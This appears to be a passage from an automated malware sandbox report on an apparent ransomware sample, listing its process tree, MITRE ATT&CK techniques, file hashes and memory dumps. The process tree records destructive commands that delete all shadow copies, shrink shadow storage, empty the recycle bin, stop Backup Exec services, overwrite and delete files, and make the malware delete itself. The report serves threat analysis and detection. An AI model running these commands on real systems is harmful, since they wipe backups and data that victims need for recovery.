  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:912
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1904
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2060
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2908
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2376
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1584
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2420
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2352
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2764
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1952
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:2568
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1A66.bat
  2⤵
  PID:1892
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2800
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2532
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1176
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  2⤵
  - Deletes itself
  PID:2616
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:2256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:1544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:1036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:2428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "463061751-1582314381438124199-559438155264157425-8942657485593056261063045831"
1⤵
- Suspicious use of WriteProcessMemory
PID:2660

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HOW_TO_DECYPHER_FILES.txt

Filesize
1KB

MD5
8431b684bc613c7d26c3c02d145efb69

SHA1
1d20d2f3fb60343bf6fde19f0e1499ee927b1106

SHA256
18675fab39e559bedd77139c7fe49d77b353e9940cfdf54058036af8a90f620e

SHA512
edbbb6337991756c6cb0d3660e68d9319764d3cfc703aa354ea7e0b13506cd42960f8e285b938fd13fb2b24f3fa15f359e4beeab538e058f75c04cf11fff5c48

Download Submit
memory/1212-5-0x0000000070690000-0x0000000070C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1212-6-0x0000000001C10000-0x0000000001C50000-memory.dmp

Filesize
256KB

Download
memory/1212-7-0x0000000070690000-0x0000000070C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1212-8-0x0000000001C10000-0x0000000001C50000-memory.dmp

Filesize
256KB

Download
memory/1212-9-0x0000000001C10000-0x0000000001C50000-memory.dmp

Filesize
256KB

Download
memory/1212-10-0x0000000070690000-0x0000000070C3B000-memory.dmp

Filesize
5.7MB

Download
memory/2392-0-0x0000000000380000-0x000000000039C000-memory.dmp

Filesize
112KB

Download
memory/2392-1-0x0000000074800000-0x0000000074EEE000-memory.dmp

Filesize
6.9MB

Download
memory/2392-2-0x0000000000500000-0x0000000000540000-memory.dmp

Filesize
256KB

Download
memory/2392-150-0x0000000074800000-0x0000000074EEE000-memory.dmp

Filesize
6.9MB

Download